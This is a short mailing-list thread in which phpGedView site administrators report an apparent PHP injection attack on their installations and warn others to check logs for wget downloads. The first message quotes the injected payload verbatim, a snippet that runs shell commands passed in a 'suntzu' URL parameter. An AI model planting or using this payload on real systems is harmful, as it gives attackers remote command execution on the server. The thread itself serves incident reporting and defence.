RE: [Phpgedview-talk] attack attempt

[Heike El-A. - T. <hei...@ya...>]

Hi Matthew,
  had an attack also.
  I am using 3.2.2. final.
  What is this wget?
  Regards,
  Heike

Matthew Gates <ma...@po...> schrieb:
  Hi all,

I had a curious user request on my phpGedView site. Looks like they're 
attempting some PHP injection style attack, using PHP code in the email 
address and other field in the user table, like this:

\';error_reporting(0);if(isset($suntzu))
{system($_GET[suntzu]);die(\'HiMaster!\');}echo\'

From my log files it looks like the attacker was trying to download a linux 
binary and a PHP script using wget. I grabbed the target files and can 
provide a sample if anyone is interested in trying to un-pick what they do 
(know a good linux dis-assembler?).

Doesn't look like they managed to do anything nasty, probably because wget 
isn't available on my server. Just a heads up for everyone to keep an eye 
out. Grep your logs for wget.

I reported the incident to SANS and they said they have seen it and sent me 
this link, which looks like a published version of the exploit:

http://www.milw0rm.com/id.php?id=1379

...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4 
final, so I think I would have been infected if I had had wget installed. 
Watch yourselves!

I'm guessing we need a patch of some sort.

Regards,
-- 
Matthew



-------------------------------------------------------
This SF.net email is sponsored by: Splunk Inc. Do you grep through log files
for problems? Stop! Download the new AJAX search engine that makes
searching your log files as easy as surfing the web. DOWNLOAD SPLUNK!
http://ads.osdn.com/?ad_idv37&alloc_id865&op=click
_______________________________________________
Phpgedview-talk mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phpgedview-talk
  


		
---------------------------------
Sarah Connor, Moshammer oder Papst Benedikt – die Top-Suchen 2005.